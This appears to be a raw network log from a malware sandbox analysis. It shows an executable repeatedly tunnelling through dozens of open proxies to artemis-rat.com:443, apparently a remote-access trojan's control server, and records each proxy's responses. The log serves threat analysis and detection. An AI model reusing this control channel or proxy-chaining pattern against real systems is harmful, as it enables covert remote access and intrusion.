                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            232192.168.2.550614104.20.34.100803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.556761026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.711235046 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            233192.168.2.550773202.159.35.2014433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.558806896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            234192.168.2.5504855.61.33.234803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.566850901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.868489027 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            235192.168.2.550462181.212.136.3475183876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.571228981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.264210939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.264337063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.405147076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405554056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.468167067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            236192.168.2.54984051.89.173.40545703876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.575664043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.592519999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.593162060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.592766047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.592717886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            237192.168.2.550248117.160.250.13088993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.577941895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.246047020 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.258116007 CET303INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            238192.168.2.550640104.24.136.68803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.582714081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.737564087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
239192.168.2.55061312.186.205.121803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.592190027 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
240192.168.2.550648104.18.254.76803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.593070984 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.748002052 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
241192.168.2.54982043.255.113.23280823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.593079090 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.592519999 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.593162060 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.592777967 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:02.592717886 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
242192.168.2.55046547.100.91.5780803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.595169067 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.946063042 CET  767  IN  HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
243192.168.2.550452103.19.59.10219833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.596142054 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.286115885 CET  19  IN  HTTP/1.1 200 OK


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
244192.168.2.550493219.243.212.11810803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.597708941 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
245192.168.2.550584162.223.94.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:38.600748062 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.883981943 CET  316  IN  HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            246192.168.2.550500213.131.230.16131283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.625210047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.940274954 CET | 39 | IN | HTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            247192.168.2.55049445.11.95.16660093876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.625210047 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            248192.168.2.550512185.104.219.229803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.625358105 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.936438084 CET | 401 | IN | HTTP/1.0 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="login"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            249192.168.2.55055062.112.10.2680803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.625909090 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.264228106 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.139267921 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.905358076 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.389985085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.889795065 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            250192.168.2.55062038.162.3.21531283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.625915051 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.039921045 CET | 111 | IN | HTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            251192.168.2.550521161.97.104.480803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.626085043 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.942673922 CET | 82 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            252192.168.2.55051418.135.133.116803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:38.626091957 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:38.918256998 CET | 116 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            253192.168.2.549896184.178.172.28152943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.629401922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            254192.168.2.55052451.158.98.211163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.629578114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
